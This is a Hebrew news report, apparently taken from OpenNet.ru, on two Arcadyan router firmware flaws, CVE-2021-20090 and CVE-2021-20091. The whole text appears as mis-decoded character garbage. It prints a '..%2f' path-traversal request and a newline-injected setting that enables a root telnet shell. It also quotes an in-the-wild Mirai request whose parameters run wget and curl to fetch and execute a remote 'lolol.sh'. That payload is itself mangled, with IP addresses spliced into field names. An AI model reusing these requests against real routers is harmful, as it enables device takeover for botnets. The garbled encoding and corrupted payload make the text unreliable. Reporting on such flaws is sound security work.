ืคื’ื™ืขื•ืช ื‘ื ืชื‘ื™ื ื‘ื™ืชื™ื™ื ื”ืžืฉืคื™ืขื” ืขืœ 17 ื™ืฆืจื ื™ื

ื”ืชืงืคื” ืžืกื™ื‘ื™ืช ื ืจืฉืžื” ื‘ืจืฉืช ื ื’ื“ ื ืชื‘ื™ื ื‘ื™ืชื™ื™ื ืฉื”ืงื•ืฉื—ื” ืฉืœื”ื ืžืฉืชืžืฉืช ื‘ื™ื™ืฉื•ื ืฉืจืช HTTP ืฉืœ ื—ื‘ืจืช Arcadyan. ื›ื“ื™ ืœื”ืฉื™ื’ ืฉืœื™ื˜ื” ืขืœ ืžื›ืฉื™ืจื™ื, ื ืขืฉื” ืฉื™ืžื•ืฉ ื‘ืฉื™ืœื•ื‘ ืฉืœ ืฉืชื™ ื ืงื•ื“ื•ืช ืชื•ืจืคื” ื”ืžืืคืฉืจื•ืช ื‘ื™ืฆื•ืข ืžืจื—ื•ืง ืฉืœ ืงื•ื“ ืฉืจื™ืจื•ืชื™ ืขื ื–ื›ื•ื™ื•ืช ืฉื•ืจืฉ. ื”ื‘ืขื™ื” ืžืฉืคื™ืขื” ืขืœ ืžื’ื•ื•ืŸ ืจื—ื‘ ืœืžื“ื™ ืฉืœ ื ืชื‘ื™ ADSL ืžื‘ื™ืช Arcadyan, ASUS ื•-Buffalo, ื›ืžื• ื’ื ืžื›ืฉื™ืจื™ื ื”ืžืกื•ืคืงื™ื ืชื—ืช ื”ืžื•ืชื’ื™ื Beeline (ื”ื‘ืขื™ื” ืžืื•ืฉืจืช ื‘-Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone ื• ืžืคืขื™ืœื™ ื˜ืœืงื•ื ืื—ืจื™ื. ื™ืฆื•ื™ืŸ ื›ื™ ื”ื‘ืขื™ื” ืงื™ื™ืžืช ื‘ืงื•ืฉื—ื” ืฉืœ Arcadyan ื›ื‘ืจ ื™ื•ืชืจ ืž-10 ืฉื ื™ื ื•ื‘ืžื”ืœืš ืชืงื•ืคื” ื–ื• ื”ืฆืœื™ื—ื” ืœืขื‘ื•ืจ ืœ-20 ื“ื’ืžื™ ืžื›ืฉื™ืจื™ื ืœืคื—ื•ืช ืž-17 ื™ืฆืจื ื™ื ืฉื•ื ื™ื.

ื”ืคื’ื™ืขื•ืช ื”ืจืืฉื•ื ื”, CVE-2021-20090, ืžืืคืฉืจืช ืœื’ืฉืช ืœื›ืœ ืกืงืจื™ืคื˜ ืฉืœ ืžืžืฉืง ืื™ื ื˜ืจื ื˜ ืœืœื ืื™ืžื•ืช. ืžื”ื•ืช ื”ืคื’ื™ืขื•ืช ื”ื™ื ืฉื‘ืžืžืฉืง ื”ืื™ื ื˜ืจื ื˜, ื—ืœืง ืžื”ืกืคืจื™ื•ืช ืฉื“ืจื›ืŸ ื ืฉืœื—ื•ืช ืชืžื•ื ื•ืช, ืงื‘ืฆื™ CSS ื•ืกืงืจื™ืคื˜ื™ื ืฉืœ JavaScript ื ื’ื™ืฉื•ืช ืœืœื ืื™ืžื•ืช. ื‘ืžืงืจื” ื–ื”, ืกืคืจื™ื•ืช ืฉืขื‘ื•ืจืŸ ืžื•ืชืจืช ื’ื™ืฉื” ืœืœื ืื™ืžื•ืช ื ื‘ื“ืงื•ืช ื‘ืืžืฆืขื•ืช ื”ืžืกื›ื” ื”ืจืืฉื•ื ื™ืช. ืฆื™ื•ืŸ ืชื•ื•ื™ "../" ื‘ื ืชื™ื‘ื™ื ืœืžืขื‘ืจ ืœืกืคืจื™ื™ืช ื”ืื‘ ื—ืกื•ืžื” ืขืœ ื™ื“ื™ ื”ืงื•ืฉื—ื”, ืืš ื”ืฉื™ืžื•ืฉ ื‘ืฉื™ืœื•ื‘ "..%2f" ื ื“ืœื’. ืœืคื™ื›ืš, ื ื™ืชืŸ ืœืคืชื•ื— ื“ืคื™ื ืžื•ื’ื ื™ื ื‘ืขืช ืฉืœื™ื—ืช ื‘ืงืฉื•ืช ื›ืžื• "http://192.168.1.1/images/..%2findex.htm".

ื”ืคื’ื™ืขื•ืช ื”ืฉื ื™ื™ื”, CVE-2021-20091, ืžืืคืฉืจืช ืœืžืฉืชืžืฉ ืžืื•ืžืช ืœื‘ืฆืข ืฉื™ื ื•ื™ื™ื ื‘ื”ื’ื“ืจื•ืช ื”ืžืขืจื›ืช ืฉืœ ื”ืžื›ืฉื™ืจ ืขืœ ื™ื“ื™ ืฉืœื™ื—ืช ืคืจืžื˜ืจื™ื ื‘ืคื•ืจืžื˜ ืžื™ื•ื—ื“ ืœืกืงืจื™ืคื˜ application_abstract.cgi, ืฉืื™ื ื• ื‘ื•ื“ืง ืืช ื ื•ื›ื—ื•ืชื• ืฉืœ ืชื• ื—ื“ืฉ ื‘ืคืจืžื˜ืจื™ื . ืœื“ื•ื’ืžื”, ื‘ืขืช ื‘ื™ืฆื•ืข ืคืขื•ืœืช ืคื™ื ื’, ืชื•ืงืฃ ื™ื›ื•ืœ ืœืฆื™ื™ืŸ ืืช ื”ืขืจืš "192.168.1.2%0AARC_SYS_TelnetdEnable=1" ื‘ืฉื“ื” ืขื ื›ืชื•ื‘ืช ื”-IP ื”ืžืกื•ืžื ืช, ื•ื”ืกืงืจื™ืคื˜, ื‘ืขืช ื™ืฆื™ืจืช ืงื•ื‘ืฅ ื”ื”ื’ื“ืจื•ืช /tmp/etc/config/ .glbcfg, ื™ื›ืชื•ื‘ ืืช ื”ืฉื•ืจื” "AARC_SYS_TelnetdEnable=1" ืœืชื•ื›ื• ", ืžื” ืฉืžืคืขื™ืœ ืืช ืฉืจืช telnetd, ื”ืžืกืคืง ื’ื™ืฉื” ืœืžืขื˜ืคืช ืคืงื•ื“ื” ื‘ืœืชื™ ืžื•ื’ื‘ืœืช ืขื ื–ื›ื•ื™ื•ืช ืฉื•ืจืฉ. ื‘ืื•ืคืŸ ื“ื•ืžื”, ืขืœ ื™ื“ื™ ื”ื’ื“ืจืช ื”ืคืจืžื˜ืจ AARC_SYS, ืืชื” ื™ื›ื•ืœ ืœื”ืคืขื™ืœ ื›ืœ ืงื•ื“ ื‘ืžืขืจื›ืช. ื”ืคื’ื™ืขื•ืช ื”ืจืืฉื•ื ื” ืžืืคืฉืจืช ืœื”ืจื™ืฅ ืกืงืจื™ืคื˜ ื‘ืขื™ื™ืชื™ ืœืœื ืื™ืžื•ืช ืขืœ ื™ื“ื™ ื’ื™ืฉื” ืืœื™ื• ื‘ืชื•ืจ "/images/..%2fapply_abstract.cgi".

ื›ื“ื™ ืœื ืฆืœ ื ืงื•ื“ื•ืช ืชื•ืจืคื”, ืชื•ืงืฃ ื—ื™ื™ื‘ ืœื”ื™ื•ืช ืžืกื•ื’ืœ ืœืฉืœื•ื— ื‘ืงืฉื” ืœื™ืฆื™ืืช ื”ืจืฉืช ืฉื‘ื” ืžืžืฉืง ื”ืื™ื ื˜ืจื ื˜ ืคื•ืขืœ. ืื ืœืฉืคื•ื˜ ืœืคื™ ื”ื“ื™ื ืžื™ืงื” ืฉืœ ื”ืชืคืฉื˜ื•ืช ื”ืžืชืงืคื”, ืžืคืขื™ืœื™ื ืจื‘ื™ื ืžืฉืื™ืจื™ื ื’ื™ืฉื” ื‘ืžื›ืฉื™ืจื™ื”ื ืžื”ืจืฉืช ื”ื—ื™ืฆื•ื ื™ืช ื›ื“ื™ ืœืคืฉื˜ ืืช ื”ืื‘ื—ื•ืŸ ืฉืœ ื‘ืขื™ื•ืช ืขืœ ื™ื“ื™ ืฉื™ืจื•ืช ื”ืชืžื™ื›ื”. ืื ื”ื’ื™ืฉื” ืœืžืžืฉืง ืžื•ื’ื‘ืœืช ืจืง ืœืจืฉืช ื”ืคื ื™ืžื™ืช, ื ื™ืชืŸ ืœื‘ืฆืข ื”ืชืงืคื” ืžืจืฉืช ื—ื™ืฆื•ื ื™ืช ื‘ื˜ื›ื ื™ืงืช "DNS rebinding". ืคื’ื™ืขื•ื™ื•ืช ื›ื‘ืจ ื ืžืฆืื•ืช ื‘ืฉื™ืžื•ืฉ ืคืขื™ืœ ืœื—ื™ื‘ื•ืจ ื ืชื‘ื™ื ืœ-Mirai botnet: POST /images/..%2fapply_abstract.cgi HTTP/1.1 ื—ื™ื‘ื•ืจ: ืกื’ื•ืจ User-Agent: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_212.192.241.7.ipaddress=0. 1%0A ARC_SYS_TelnetdEnable=212.192.241.72& %212.192.241.72AARC_SYS_=cd+/tmp; wget+http://777/lolol.sh; curl+-O+http://0/lolol.sh; chmod+4+lolol.sh; sh+lolol.sh&ARC_ping_status=XNUMX&TMP_Ping_Type=XNUMX

ืžืงื•ืจ: OpenNet.ru

ื”ื•ืกืคืช ืชื’ื•ื‘ื”